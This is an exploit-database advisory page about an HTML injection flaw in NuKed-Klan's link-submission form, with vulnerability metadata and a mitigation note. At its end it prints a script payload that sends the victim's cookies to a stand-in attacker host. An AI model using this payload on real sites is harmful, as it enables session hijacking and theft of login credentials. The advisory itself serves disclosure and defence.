Notice: Function _load_textdomain_just_in_time was called incorrectly. Translation loading for the wp-pagenavi domain was triggered too early. This is usually an indicator for some code in the plugin or theme running too early. Translations should be loaded at the init action or later. Please see Debugging in WordPress for more information. (This message was added in version 6.7.0.) in /home/u918112125/domains/exploit.company/public_html/wp-includes/functions.php on line 6114
HTML Injection in NuKed-Klan 'submit URI link' function - exploit.company
header-logo
Suggest Exploit
vendor:
NuKed-Klan
by:
Unknown
7.5
CVSS
HIGH
HTML Injection
79
CWE
Product Name: NuKed-Klan
Affected Version From: Unknown
Affected Version To: Unknown
Patch Exists: NO
Related CWE: Unknown
CPE: a:nukedklan:nukedklan
Metasploit:
Other Scripts:
Platforms Tested:
Unknown

HTML Injection in NuKed-Klan ‘submit URI link’ function

The 'submit URI link' function in NuKed-Klan is prone to a HTML injection vulnerability. This is due to a lack of input validation on the 'website name' input field of the form. Attackers can exploit this vulnerability to manipulate web content or steal cookie-based authentication credentials. They can also perform arbitrary actions as the victim user.

Mitigation:

Implement proper input validation and sanitization to prevent HTML injection attacks. Also, ensure that cookie-based authentication credentials are properly protected.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/11733/info

NuKed-Klan 'submit URI link' function is reported prone to a HTML injection vulnerability. It is reported that the issue exists due to a lack of sufficient input validation performed on the 'website name' input field of the NuKed-Klan submit URI link form.

Attackers may potentially exploit this issue to manipulate web content or to steal cookie-based authentication credentials. It may also be possible to take arbitrary actions as the victim user.

http://www.example.com/index.php?file=Suggest&module=Links
[Name of website] [a lot of spaces]
\'/>\"/><script></script><script>document.location=\'http://www.hacker.com/cookie.php?cookie=\'
+window.document.cookie;</script>